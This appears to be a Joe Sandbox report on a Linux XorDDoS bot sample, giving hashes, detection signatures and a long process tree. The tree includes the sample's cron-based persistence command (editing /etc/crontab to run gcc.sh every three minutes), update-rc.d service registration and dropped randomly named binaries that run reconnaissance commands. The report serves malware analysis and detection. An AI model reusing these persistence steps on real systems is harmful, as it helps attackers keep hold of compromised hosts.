Edit tour

Linux Analysis Report
fuck.elf

Overview

General Information

Sample Name:	fuck.elf
Analysis ID:	707433
MD5:	ee5edcc4d824db63a8c8264a8631f067
SHA1:	ce483e6b254cc3ed3ede2e1fee3f959cc4eddbe8
SHA256:	b84cf164fde12dd07192aa44f1b943044610539fd979e0f9359d44062f21a612
Tags:	elfSevenYearsAgoXorddos
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Yara detected XorDDoS Bot

Snort IDS alert for network traffic

Sample tries to persist itself using System V runlevels

Machine Learning detection for dropped file

Sample tries to persist itself using cron

Drops files in suspicious directories

Sample deletes itself

Machine Learning detection for sample

Writes ELF files to disk

Yara signature match

Drops files with innocent-looking names

PID-file does not contain an ASCII number

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "systemctl" command used for controlling the systemd system and service manager

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Sample and/or dropped files contains symbols with suspicious names

Reads CPU information from /proc indicative of miner or evasive malware

Writes shell script file to disk with an unusual file extension

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	707433
Start date and time:	2022-09-21 23:38:34 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	fuck.elf
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/19@3/0

Warnings

VT rate limit hit for: /usr/bin/axppigwavk

Runtime Messages

Command:	/tmp/fuck.elf
PID:	6235
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

fuck.elf (PID: 6235, Parent: 6127, MD5: ee5edcc4d824db63a8c8264a8631f067) Arguments: /tmp/fuck.elf

fuck.elf New Fork (PID: 6236, Parent: 6235)

fuck.elf New Fork (PID: 6237, Parent: 6236)

fuck.elf New Fork (PID: 6238, Parent: 6237)

fuck.elf New Fork (PID: 6239, Parent: 6236)

fuck.elf New Fork (PID: 6240, Parent: 6239)

update-rc.d (PID: 6240, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d fuck.elf defaults

update-rc.d New Fork (PID: 6245, Parent: 6240)

systemctl (PID: 6245, Parent: 6240, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

fuck.elf New Fork (PID: 6241, Parent: 6236)

sh (PID: 6241, Parent: 6236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6242, Parent: 6241)

sed (PID: 6242, Parent: 6241, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

fuck.elf New Fork (PID: 6270, Parent: 6236)

fuck.elf New Fork (PID: 6271, Parent: 6270)

zfyjfaoiow (PID: 6271, Parent: 6270, MD5: e87ceadb8a4e38e1d33a543f1ef6f174) Arguments: /usr/bin/zfyjfaoiow id 6236

zfyjfaoiow New Fork (PID: 6272, Parent: 6271)

fuck.elf New Fork (PID: 6273, Parent: 6236)

fuck.elf New Fork (PID: 6274, Parent: 6273)

zfyjfaoiow (PID: 6274, Parent: 6273, MD5: e87ceadb8a4e38e1d33a543f1ef6f174) Arguments: /usr/bin/zfyjfaoiow id 6236

zfyjfaoiow New Fork (PID: 6277, Parent: 6274)

fuck.elf New Fork (PID: 6275, Parent: 6236)

fuck.elf New Fork (PID: 6276, Parent: 6275)

zfyjfaoiow (PID: 6276, Parent: 6275, MD5: e87ceadb8a4e38e1d33a543f1ef6f174) Arguments: /usr/bin/zfyjfaoiow top 6236

zfyjfaoiow New Fork (PID: 6280, Parent: 6276)

fuck.elf New Fork (PID: 6278, Parent: 6236)

fuck.elf New Fork (PID: 6279, Parent: 6278)

zfyjfaoiow (PID: 6279, Parent: 6278, MD5: e87ceadb8a4e38e1d33a543f1ef6f174) Arguments: /usr/bin/zfyjfaoiow pwd 6236

zfyjfaoiow New Fork (PID: 6283, Parent: 6279)

fuck.elf New Fork (PID: 6281, Parent: 6236)

fuck.elf New Fork (PID: 6282, Parent: 6281)

zfyjfaoiow (PID: 6282, Parent: 6281, MD5: e87ceadb8a4e38e1d33a543f1ef6f174) Arguments: /usr/bin/zfyjfaoiow "ifconfig eth0" 6236

zfyjfaoiow New Fork (PID: 6284, Parent: 6282)

fuck.elf New Fork (PID: 6288, Parent: 6236)

fuck.elf New Fork (PID: 6289, Parent: 6288)

hwcijqdbza (PID: 6289, Parent: 6288, MD5: 7a51136a3f9c74ff582dade0a6ff9c1e) Arguments: /usr/bin/hwcijqdbza "grep \"A\"" 6236

hwcijqdbza New Fork (PID: 6290, Parent: 6289)

fuck.elf New Fork (PID: 6291, Parent: 6236)

fuck.elf New Fork (PID: 6292, Parent: 6291)

hwcijqdbza (PID: 6292, Parent: 6291, MD5: 7a51136a3f9c74ff582dade0a6ff9c1e) Arguments: /usr/bin/hwcijqdbza "echo \"find\"" 6236

hwcijqdbza New Fork (PID: 6293, Parent: 6292)

fuck.elf New Fork (PID: 6294, Parent: 6236)

fuck.elf New Fork (PID: 6295, Parent: 6294)

hwcijqdbza (PID: 6295, Parent: 6294, MD5: 7a51136a3f9c74ff582dade0a6ff9c1e) Arguments: /usr/bin/hwcijqdbza id 6236

hwcijqdbza New Fork (PID: 6300, Parent: 6295)

fuck.elf New Fork (PID: 6296, Parent: 6236)

fuck.elf New Fork (PID: 6297, Parent: 6296)

hwcijqdbza (PID: 6297, Parent: 6296, MD5: 7a51136a3f9c74ff582dade0a6ff9c1e) Arguments: /usr/bin/hwcijqdbza "netstat -antop" 6236

hwcijqdbza New Fork (PID: 6301, Parent: 6297)

fuck.elf New Fork (PID: 6298, Parent: 6236)

fuck.elf New Fork (PID: 6299, Parent: 6298)

hwcijqdbza (PID: 6299, Parent: 6298, MD5: 7a51136a3f9c74ff582dade0a6ff9c1e) Arguments: /usr/bin/hwcijqdbza "sleep 1" 6236

hwcijqdbza New Fork (PID: 6302, Parent: 6299)

fuck.elf New Fork (PID: 6305, Parent: 6236)

fuck.elf New Fork (PID: 6306, Parent: 6305)

ggsxjmacxa (PID: 6306, Parent: 6305, MD5: 7e521ab8f870858fcfe5d5814bddc362) Arguments: /usr/bin/ggsxjmacxa "ifconfig eth0" 6236

ggsxjmacxa New Fork (PID: 6307, Parent: 6306)

fuck.elf New Fork (PID: 6308, Parent: 6236)

fuck.elf New Fork (PID: 6309, Parent: 6308)

ggsxjmacxa (PID: 6309, Parent: 6308, MD5: 7e521ab8f870858fcfe5d5814bddc362) Arguments: /usr/bin/ggsxjmacxa "ls -la" 6236

ggsxjmacxa New Fork (PID: 6312, Parent: 6309)

fuck.elf New Fork (PID: 6310, Parent: 6236)

fuck.elf New Fork (PID: 6311, Parent: 6310)

ggsxjmacxa (PID: 6311, Parent: 6310, MD5: 7e521ab8f870858fcfe5d5814bddc362) Arguments: /usr/bin/ggsxjmacxa "ifconfig eth0" 6236

ggsxjmacxa New Fork (PID: 6315, Parent: 6311)

fuck.elf New Fork (PID: 6313, Parent: 6236)

fuck.elf New Fork (PID: 6314, Parent: 6313)

ggsxjmacxa (PID: 6314, Parent: 6313, MD5: 7e521ab8f870858fcfe5d5814bddc362) Arguments: /usr/bin/ggsxjmacxa "sleep 1" 6236

ggsxjmacxa New Fork (PID: 6318, Parent: 6314)

fuck.elf New Fork (PID: 6316, Parent: 6236)

fuck.elf New Fork (PID: 6317, Parent: 6316)

ggsxjmacxa (PID: 6317, Parent: 6316, MD5: 7e521ab8f870858fcfe5d5814bddc362) Arguments: /usr/bin/ggsxjmacxa "cd /etc" 6236

ggsxjmacxa New Fork (PID: 6319, Parent: 6317)

fuck.elf New Fork (PID: 6322, Parent: 6236)

fuck.elf New Fork (PID: 6323, Parent: 6322)

sanzuhhixf (PID: 6323, Parent: 6322, MD5: 20020d772de3b4a641da0272b36f3272) Arguments: /usr/bin/sanzuhhixf sh 6236

sanzuhhixf New Fork (PID: 6324, Parent: 6323)

fuck.elf New Fork (PID: 6325, Parent: 6236)

fuck.elf New Fork (PID: 6326, Parent: 6325)

sanzuhhixf (PID: 6326, Parent: 6325, MD5: 20020d772de3b4a641da0272b36f3272) Arguments: /usr/bin/sanzuhhixf "netstat -an" 6236

sanzuhhixf New Fork (PID: 6329, Parent: 6326)

fuck.elf New Fork (PID: 6327, Parent: 6236)

fuck.elf New Fork (PID: 6328, Parent: 6327)

sanzuhhixf (PID: 6328, Parent: 6327, MD5: 20020d772de3b4a641da0272b36f3272) Arguments: /usr/bin/sanzuhhixf "echo \"find\"" 6236

sanzuhhixf New Fork (PID: 6334, Parent: 6328)

fuck.elf New Fork (PID: 6330, Parent: 6236)

fuck.elf New Fork (PID: 6331, Parent: 6330)

sanzuhhixf (PID: 6331, Parent: 6330, MD5: 20020d772de3b4a641da0272b36f3272) Arguments: /usr/bin/sanzuhhixf top 6236

sanzuhhixf New Fork (PID: 6335, Parent: 6331)

fuck.elf New Fork (PID: 6332, Parent: 6236)

fuck.elf New Fork (PID: 6333, Parent: 6332)

sanzuhhixf (PID: 6333, Parent: 6332, MD5: 20020d772de3b4a641da0272b36f3272) Arguments: /usr/bin/sanzuhhixf ls 6236

sanzuhhixf New Fork (PID: 6336, Parent: 6333)

fuck.elf New Fork (PID: 6339, Parent: 6236)

fuck.elf New Fork (PID: 6340, Parent: 6339)

zkleyiegjf (PID: 6340, Parent: 6339, MD5: f6b5753a34aff292e6ecb9853b898493) Arguments: /usr/bin/zkleyiegjf "echo \"find\"" 6236

zkleyiegjf New Fork (PID: 6341, Parent: 6340)

fuck.elf New Fork (PID: 6342, Parent: 6236)

fuck.elf New Fork (PID: 6343, Parent: 6342)

zkleyiegjf (PID: 6343, Parent: 6342, MD5: f6b5753a34aff292e6ecb9853b898493) Arguments: /usr/bin/zkleyiegjf su 6236

zkleyiegjf New Fork (PID: 6345, Parent: 6343)

fuck.elf New Fork (PID: 6344, Parent: 6236)

fuck.elf New Fork (PID: 6346, Parent: 6344)

zkleyiegjf (PID: 6346, Parent: 6344, MD5: f6b5753a34aff292e6ecb9853b898493) Arguments: /usr/bin/zkleyiegjf "cat resolv.conf" 6236

zkleyiegjf New Fork (PID: 6349, Parent: 6346)

fuck.elf New Fork (PID: 6347, Parent: 6236)

fuck.elf New Fork (PID: 6348, Parent: 6347)

zkleyiegjf (PID: 6348, Parent: 6347, MD5: f6b5753a34aff292e6ecb9853b898493) Arguments: /usr/bin/zkleyiegjf "echo \"find\"" 6236

zkleyiegjf New Fork (PID: 6352, Parent: 6348)

fuck.elf New Fork (PID: 6350, Parent: 6236)

fuck.elf New Fork (PID: 6351, Parent: 6350)

zkleyiegjf (PID: 6351, Parent: 6350, MD5: f6b5753a34aff292e6ecb9853b898493) Arguments: /usr/bin/zkleyiegjf "netstat -antop" 6236

zkleyiegjf New Fork (PID: 6355, Parent: 6351)

fuck.elf New Fork (PID: 6358, Parent: 6236)

fuck.elf New Fork (PID: 6359, Parent: 6358)

xocmdvejxu (PID: 6359, Parent: 6358, MD5: 6d859ddf2b3dd9e23e5c6a3ae4ecfbff) Arguments: /usr/bin/xocmdvejxu "sleep 1" 6236

xocmdvejxu New Fork (PID: 6360, Parent: 6359)

fuck.elf New Fork (PID: 6361, Parent: 6236)

fuck.elf New Fork (PID: 6362, Parent: 6361)

xocmdvejxu (PID: 6362, Parent: 6361, MD5: 6d859ddf2b3dd9e23e5c6a3ae4ecfbff) Arguments: /usr/bin/xocmdvejxu pwd 6236

xocmdvejxu New Fork (PID: 6363, Parent: 6362)

fuck.elf New Fork (PID: 6364, Parent: 6236)

fuck.elf New Fork (PID: 6365, Parent: 6364)

xocmdvejxu (PID: 6365, Parent: 6364, MD5: 6d859ddf2b3dd9e23e5c6a3ae4ecfbff) Arguments: /usr/bin/xocmdvejxu "ls -la" 6236

xocmdvejxu New Fork (PID: 6366, Parent: 6365)

fuck.elf New Fork (PID: 6367, Parent: 6236)

fuck.elf New Fork (PID: 6368, Parent: 6367)

xocmdvejxu (PID: 6368, Parent: 6367, MD5: 6d859ddf2b3dd9e23e5c6a3ae4ecfbff) Arguments: /usr/bin/xocmdvejxu sh 6236

xocmdvejxu New Fork (PID: 6371, Parent: 6368)

fuck.elf New Fork (PID: 6369, Parent: 6236)

fuck.elf New Fork (PID: 6370, Parent: 6369)

xocmdvejxu (PID: 6370, Parent: 6369, MD5: 6d859ddf2b3dd9e23e5c6a3ae4ecfbff) Arguments: /usr/bin/xocmdvejxu whoami 6236

xocmdvejxu New Fork (PID: 6372, Parent: 6370)

fuck.elf New Fork (PID: 6376, Parent: 6236)

fuck.elf New Fork (PID: 6377, Parent: 6376)

wjnxqdxblo (PID: 6377, Parent: 6376, MD5: df30f28270f8c66ac8e73c3febe841cd) Arguments: /usr/bin/wjnxqdxblo "cat resolv.conf" 6236

wjnxqdxblo New Fork (PID: 6378, Parent: 6377)

fuck.elf New Fork (PID: 6379, Parent: 6236)

fuck.elf New Fork (PID: 6380, Parent: 6379)

wjnxqdxblo (PID: 6380, Parent: 6379, MD5: df30f28270f8c66ac8e73c3febe841cd) Arguments: /usr/bin/wjnxqdxblo bash 6236

wjnxqdxblo New Fork (PID: 6381, Parent: 6380)

fuck.elf New Fork (PID: 6382, Parent: 6236)

fuck.elf New Fork (PID: 6383, Parent: 6382)

wjnxqdxblo (PID: 6383, Parent: 6382, MD5: df30f28270f8c66ac8e73c3febe841cd) Arguments: /usr/bin/wjnxqdxblo "netstat -antop" 6236

wjnxqdxblo New Fork (PID: 6384, Parent: 6383)

fuck.elf New Fork (PID: 6385, Parent: 6236)

fuck.elf New Fork (PID: 6386, Parent: 6385)

wjnxqdxblo (PID: 6386, Parent: 6385, MD5: df30f28270f8c66ac8e73c3febe841cd) Arguments: /usr/bin/wjnxqdxblo "grep \"A\"" 6236

wjnxqdxblo New Fork (PID: 6388, Parent: 6386)

fuck.elf New Fork (PID: 6387, Parent: 6236)

fuck.elf New Fork (PID: 6389, Parent: 6387)

wjnxqdxblo (PID: 6389, Parent: 6387, MD5: df30f28270f8c66ac8e73c3febe841cd) Arguments: /usr/bin/wjnxqdxblo top 6236

wjnxqdxblo New Fork (PID: 6390, Parent: 6389)

fuck.elf New Fork (PID: 6395, Parent: 6236)

fuck.elf New Fork (PID: 6396, Parent: 6395)

oklqvchkds (PID: 6396, Parent: 6395, MD5: 56eb989faec3c2ab2a2afbaec7ea40eb) Arguments: /usr/bin/oklqvchkds pwd 6236

oklqvchkds New Fork (PID: 6397, Parent: 6396)

fuck.elf New Fork (PID: 6398, Parent: 6236)

fuck.elf New Fork (PID: 6399, Parent: 6398)

oklqvchkds (PID: 6399, Parent: 6398, MD5: 56eb989faec3c2ab2a2afbaec7ea40eb) Arguments: /usr/bin/oklqvchkds "route -n" 6236

oklqvchkds New Fork (PID: 6400, Parent: 6399)

fuck.elf New Fork (PID: 6401, Parent: 6236)

fuck.elf New Fork (PID: 6402, Parent: 6401)

oklqvchkds (PID: 6402, Parent: 6401, MD5: 56eb989faec3c2ab2a2afbaec7ea40eb) Arguments: /usr/bin/oklqvchkds whoami 6236

oklqvchkds New Fork (PID: 6403, Parent: 6402)

fuck.elf New Fork (PID: 6404, Parent: 6236)

fuck.elf New Fork (PID: 6405, Parent: 6404)

oklqvchkds (PID: 6405, Parent: 6404, MD5: 56eb989faec3c2ab2a2afbaec7ea40eb) Arguments: /usr/bin/oklqvchkds ls 6236

oklqvchkds New Fork (PID: 6408, Parent: 6405)

fuck.elf New Fork (PID: 6406, Parent: 6236)

fuck.elf New Fork (PID: 6407, Parent: 6406)

oklqvchkds (PID: 6407, Parent: 6406, MD5: 56eb989faec3c2ab2a2afbaec7ea40eb) Arguments: /usr/bin/oklqvchkds pwd 6236

oklqvchkds New Fork (PID: 6409, Parent: 6407)

fuck.elf New Fork (PID: 6412, Parent: 6236)

fuck.elf New Fork (PID: 6413, Parent: 6412)

axppigwavk (PID: 6413, Parent: 6412, MD5: 0b94411d21ccce661e8cdaa0383ff15f) Arguments: /usr/bin/axppigwavk su 6236

axppigwavk New Fork (PID: 6414, Parent: 6413)

fuck.elf New Fork (PID: 6415, Parent: 6236)

fuck.elf New Fork (PID: 6416, Parent: 6415)

axppigwavk (PID: 6416, Parent: 6415, MD5: 0b94411d21ccce661e8cdaa0383ff15f) Arguments: /usr/bin/axppigwavk "cat resolv.conf" 6236

axppigwavk New Fork (PID: 6417, Parent: 6416)

fuck.elf New Fork (PID: 6418, Parent: 6236)

fuck.elf New Fork (PID: 6419, Parent: 6418)

axppigwavk (PID: 6419, Parent: 6418, MD5: 0b94411d21ccce661e8cdaa0383ff15f) Arguments: /usr/bin/axppigwavk "route -n" 6236

axppigwavk New Fork (PID: 6420, Parent: 6419)

fuck.elf New Fork (PID: 6421, Parent: 6236)

fuck.elf New Fork (PID: 6422, Parent: 6421)

axppigwavk (PID: 6422, Parent: 6421, MD5: 0b94411d21ccce661e8cdaa0383ff15f) Arguments: /usr/bin/axppigwavk "ifconfig eth0" 6236

axppigwavk New Fork (PID: 6425, Parent: 6422)

fuck.elf New Fork (PID: 6423, Parent: 6236)

fuck.elf New Fork (PID: 6424, Parent: 6423)

axppigwavk (PID: 6424, Parent: 6423, MD5: 0b94411d21ccce661e8cdaa0383ff15f) Arguments: /usr/bin/axppigwavk "echo \"find\"" 6236

axppigwavk New Fork (PID: 6426, Parent: 6424)

fuck.elf New Fork (PID: 6429, Parent: 6236)

fuck.elf New Fork (PID: 6430, Parent: 6429)

ujuhiugmmi (PID: 6430, Parent: 6429, MD5: 3bf5a8180c278833dc913e174de19ba4) Arguments: /usr/bin/ujuhiugmmi "ps -ef" 6236

ujuhiugmmi New Fork (PID: 6431, Parent: 6430)

fuck.elf New Fork (PID: 6432, Parent: 6236)

fuck.elf New Fork (PID: 6433, Parent: 6432)

ujuhiugmmi (PID: 6433, Parent: 6432, MD5: 3bf5a8180c278833dc913e174de19ba4) Arguments: /usr/bin/ujuhiugmmi "ls -la" 6236

ujuhiugmmi New Fork (PID: 6434, Parent: 6433)

fuck.elf New Fork (PID: 6435, Parent: 6236)

fuck.elf New Fork (PID: 6436, Parent: 6435)

ujuhiugmmi (PID: 6436, Parent: 6435, MD5: 3bf5a8180c278833dc913e174de19ba4) Arguments: /usr/bin/ujuhiugmmi whoami 6236

ujuhiugmmi New Fork (PID: 6437, Parent: 6436)

fuck.elf New Fork (PID: 6438, Parent: 6236)

fuck.elf New Fork (PID: 6439, Parent: 6438)

ujuhiugmmi (PID: 6439, Parent: 6438, MD5: 3bf5a8180c278833dc913e174de19ba4) Arguments: /usr/bin/ujuhiugmmi "ps -ef" 6236

ujuhiugmmi New Fork (PID: 6440, Parent: 6439)

fuck.elf New Fork (PID: 6441, Parent: 6236)

fuck.elf New Fork (PID: 6442, Parent: 6441)

ujuhiugmmi (PID: 6442, Parent: 6441, MD5: 3bf5a8180c278833dc913e174de19ba4) Arguments: /usr/bin/ujuhiugmmi ifconfig 6236

ujuhiugmmi New Fork (PID: 6443, Parent: 6442)

fuck.elf New Fork (PID: 6448, Parent: 6236)

fuck.elf New Fork (PID: 6449, Parent: 6448)

xodlvzjoas (PID: 6449, Parent: 6448, MD5: dfd3d04bbf2779fabbef0fec22258c2e) Arguments: /usr/bin/xodlvzjoas who 6236

xodlvzjoas New Fork (PID: 6450, Parent: 6449)

fuck.elf New Fork (PID: 6451, Parent: 6236)

fuck.elf New Fork (PID: 6452, Parent: 6451)

xodlvzjoas (PID: 6452, Parent: 6451, MD5: dfd3d04bbf2779fabbef0fec22258c2e) Arguments: /usr/bin/xodlvzjoas whoami 6236

xodlvzjoas New Fork (PID: 6453, Parent: 6452)

fuck.elf New Fork (PID: 6454, Parent: 6236)

fuck.elf New Fork (PID: 6455, Parent: 6454)

xodlvzjoas (PID: 6455, Parent: 6454, MD5: dfd3d04bbf2779fabbef0fec22258c2e) Arguments: /usr/bin/xodlvzjoas uptime 6236

xodlvzjoas New Fork (PID: 6456, Parent: 6455)

fuck.elf New Fork (PID: 6457, Parent: 6236)

fuck.elf New Fork (PID: 6458, Parent: 6457)

xodlvzjoas (PID: 6458, Parent: 6457, MD5: dfd3d04bbf2779fabbef0fec22258c2e) Arguments: /usr/bin/xodlvzjoas uptime 6236

xodlvzjoas New Fork (PID: 6460, Parent: 6458)

fuck.elf New Fork (PID: 6459, Parent: 6236)

fuck.elf New Fork (PID: 6461, Parent: 6459)

xodlvzjoas (PID: 6461, Parent: 6459, MD5: dfd3d04bbf2779fabbef0fec22258c2e) Arguments: /usr/bin/xodlvzjoas "ls -la" 6236

xodlvzjoas New Fork (PID: 6462, Parent: 6461)

fuck.elf New Fork (PID: 6466, Parent: 6236)

fuck.elf New Fork (PID: 6467, Parent: 6466)

jflhtagbsg (PID: 6467, Parent: 6466, MD5: 3d4268e4b1640cd06adef2fd8e500b35) Arguments: /usr/bin/jflhtagbsg "ls -la" 6236

jflhtagbsg New Fork (PID: 6468, Parent: 6467)

fuck.elf New Fork (PID: 6469, Parent: 6236)

fuck.elf New Fork (PID: 6470, Parent: 6469)

jflhtagbsg (PID: 6470, Parent: 6469, MD5: 3d4268e4b1640cd06adef2fd8e500b35) Arguments: /usr/bin/jflhtagbsg "sleep 1" 6236

jflhtagbsg New Fork (PID: 6471, Parent: 6470)

fuck.elf New Fork (PID: 6472, Parent: 6236)

fuck.elf New Fork (PID: 6473, Parent: 6472)

jflhtagbsg (PID: 6473, Parent: 6472, MD5: 3d4268e4b1640cd06adef2fd8e500b35) Arguments: /usr/bin/jflhtagbsg "netstat -an" 6236

jflhtagbsg New Fork (PID: 6474, Parent: 6473)

fuck.elf New Fork (PID: 6475, Parent: 6236)

fuck.elf New Fork (PID: 6476, Parent: 6475)

jflhtagbsg (PID: 6476, Parent: 6475, MD5: 3d4268e4b1640cd06adef2fd8e500b35) Arguments: /usr/bin/jflhtagbsg sh 6236

jflhtagbsg New Fork (PID: 6479, Parent: 6476)

fuck.elf New Fork (PID: 6477, Parent: 6236)

fuck.elf New Fork (PID: 6478, Parent: 6477)

jflhtagbsg (PID: 6478, Parent: 6477, MD5: 3d4268e4b1640cd06adef2fd8e500b35) Arguments: /usr/bin/jflhtagbsg "netstat -antop" 6236

jflhtagbsg New Fork (PID: 6480, Parent: 6478)

fuck.elf New Fork (PID: 6483, Parent: 6236)

fuck.elf New Fork (PID: 6484, Parent: 6483)

pzvxnaaphf (PID: 6484, Parent: 6483, MD5: 1ea2503bf021167e0ad5cd9e4105e210) Arguments: /usr/bin/pzvxnaaphf ifconfig 6236

pzvxnaaphf New Fork (PID: 6485, Parent: 6484)

fuck.elf New Fork (PID: 6486, Parent: 6236)

fuck.elf New Fork (PID: 6487, Parent: 6486)

pzvxnaaphf (PID: 6487, Parent: 6486, MD5: 1ea2503bf021167e0ad5cd9e4105e210) Arguments: /usr/bin/pzvxnaaphf whoami 6236

pzvxnaaphf New Fork (PID: 6490, Parent: 6487)

fuck.elf New Fork (PID: 6488, Parent: 6236)

fuck.elf New Fork (PID: 6489, Parent: 6488)

pzvxnaaphf (PID: 6489, Parent: 6488, MD5: 1ea2503bf021167e0ad5cd9e4105e210) Arguments: /usr/bin/pzvxnaaphf "grep \"A\"" 6236

pzvxnaaphf New Fork (PID: 6493, Parent: 6489)

fuck.elf New Fork (PID: 6491, Parent: 6236)

fuck.elf New Fork (PID: 6492, Parent: 6491)

pzvxnaaphf (PID: 6492, Parent: 6491, MD5: 1ea2503bf021167e0ad5cd9e4105e210) Arguments: /usr/bin/pzvxnaaphf "grep \"A\"" 6236

pzvxnaaphf New Fork (PID: 6496, Parent: 6492)

fuck.elf New Fork (PID: 6494, Parent: 6236)

fuck.elf New Fork (PID: 6495, Parent: 6494)

pzvxnaaphf (PID: 6495, Parent: 6494, MD5: 1ea2503bf021167e0ad5cd9e4105e210) Arguments: /usr/bin/pzvxnaaphf ls 6236

pzvxnaaphf New Fork (PID: 6497, Parent: 6495)

fuck.elf New Fork (PID: 6500, Parent: 6236)

fuck.elf New Fork (PID: 6501, Parent: 6500)

kvwpsxprqf (PID: 6501, Parent: 6500, MD5: 601054bef78df59d8c288b864c76fac6) Arguments: /usr/bin/kvwpsxprqf "ps -ef" 6236

kvwpsxprqf New Fork (PID: 6502, Parent: 6501)

fuck.elf New Fork (PID: 6503, Parent: 6236)

fuck.elf New Fork (PID: 6504, Parent: 6503)

kvwpsxprqf (PID: 6504, Parent: 6503, MD5: 601054bef78df59d8c288b864c76fac6) Arguments: /usr/bin/kvwpsxprqf ifconfig 6236

kvwpsxprqf New Fork (PID: 6507, Parent: 6504)

fuck.elf New Fork (PID: 6505, Parent: 6236)

fuck.elf New Fork (PID: 6506, Parent: 6505)

kvwpsxprqf (PID: 6506, Parent: 6505, MD5: 601054bef78df59d8c288b864c76fac6) Arguments: /usr/bin/kvwpsxprqf bash 6236

kvwpsxprqf New Fork (PID: 6510, Parent: 6506)

fuck.elf New Fork (PID: 6508, Parent: 6236)

fuck.elf New Fork (PID: 6509, Parent: 6508)

kvwpsxprqf (PID: 6509, Parent: 6508, MD5: 601054bef78df59d8c288b864c76fac6) Arguments: /usr/bin/kvwpsxprqf pwd 6236

kvwpsxprqf New Fork (PID: 6513, Parent: 6509)

fuck.elf New Fork (PID: 6511, Parent: 6236)

fuck.elf New Fork (PID: 6512, Parent: 6511)

kvwpsxprqf (PID: 6512, Parent: 6511, MD5: 601054bef78df59d8c288b864c76fac6) Arguments: /usr/bin/kvwpsxprqf "cd /etc" 6236

kvwpsxprqf New Fork (PID: 6514, Parent: 6512)

fuck.elf New Fork (PID: 6517, Parent: 6236)

fuck.elf New Fork (PID: 6518, Parent: 6517)

mkiihbalnq (PID: 6518, Parent: 6517, MD5: 900e00841f9ce63bf059581608ca2b3d) Arguments: /usr/bin/mkiihbalnq uptime 6236

mkiihbalnq New Fork (PID: 6519, Parent: 6518)

fuck.elf New Fork (PID: 6520, Parent: 6236)

fuck.elf New Fork (PID: 6521, Parent: 6520)

mkiihbalnq (PID: 6521, Parent: 6520, MD5: 900e00841f9ce63bf059581608ca2b3d) Arguments: /usr/bin/mkiihbalnq sh 6236

mkiihbalnq New Fork (PID: 6524, Parent: 6521)

fuck.elf New Fork (PID: 6525, Parent: 6236)

fuck.elf New Fork (PID: 6526, Parent: 6525)

mkiihbalnq (PID: 6526, Parent: 6525, MD5: 900e00841f9ce63bf059581608ca2b3d) Arguments: /usr/bin/mkiihbalnq ifconfig 6236

mkiihbalnq New Fork (PID: 6528, Parent: 6526)

fuck.elf New Fork (PID: 6527, Parent: 6236)

fuck.elf New Fork (PID: 6529, Parent: 6527)

mkiihbalnq (PID: 6529, Parent: 6527, MD5: 900e00841f9ce63bf059581608ca2b3d) Arguments: /usr/bin/mkiihbalnq uptime 6236

mkiihbalnq New Fork (PID: 6532, Parent: 6529)

fuck.elf New Fork (PID: 6530, Parent: 6236)

fuck.elf New Fork (PID: 6531, Parent: 6530)

mkiihbalnq (PID: 6531, Parent: 6530, MD5: 900e00841f9ce63bf059581608ca2b3d) Arguments: /usr/bin/mkiihbalnq "sleep 1" 6236

mkiihbalnq New Fork (PID: 6533, Parent: 6531)

fuck.elf New Fork (PID: 6537, Parent: 6236)

fuck.elf New Fork (PID: 6538, Parent: 6537)

azkwpscekh (PID: 6538, Parent: 6537, MD5: a9404a961ef5413232dec112bcf0fd0c) Arguments: /usr/bin/azkwpscekh "route -n" 6236

azkwpscekh New Fork (PID: 6539, Parent: 6538)

fuck.elf New Fork (PID: 6540, Parent: 6236)

fuck.elf New Fork (PID: 6541, Parent: 6540)

azkwpscekh (PID: 6541, Parent: 6540, MD5: a9404a961ef5413232dec112bcf0fd0c) Arguments: /usr/bin/azkwpscekh id 6236

azkwpscekh New Fork (PID: 6542, Parent: 6541)

fuck.elf New Fork (PID: 6543, Parent: 6236)

fuck.elf New Fork (PID: 6544, Parent: 6543)

azkwpscekh (PID: 6544, Parent: 6543, MD5: a9404a961ef5413232dec112bcf0fd0c) Arguments: /usr/bin/azkwpscekh "echo \"find\"" 6236

azkwpscekh New Fork (PID: 6545, Parent: 6544)

fuck.elf New Fork (PID: 6546, Parent: 6236)

fuck.elf New Fork (PID: 6547, Parent: 6546)

azkwpscekh (PID: 6547, Parent: 6546, MD5: a9404a961ef5413232dec112bcf0fd0c) Arguments: /usr/bin/azkwpscekh "echo \"find\"" 6236

azkwpscekh New Fork (PID: 6550, Parent: 6547)

fuck.elf New Fork (PID: 6548, Parent: 6236)

fuck.elf New Fork (PID: 6549, Parent: 6548)

azkwpscekh (PID: 6549, Parent: 6548, MD5: a9404a961ef5413232dec112bcf0fd0c) Arguments: /usr/bin/azkwpscekh "echo \"find\"" 6236

azkwpscekh New Fork (PID: 6551, Parent: 6549)

fuck.elf New Fork (PID: 6555, Parent: 6236)

fuck.elf New Fork (PID: 6556, Parent: 6555)

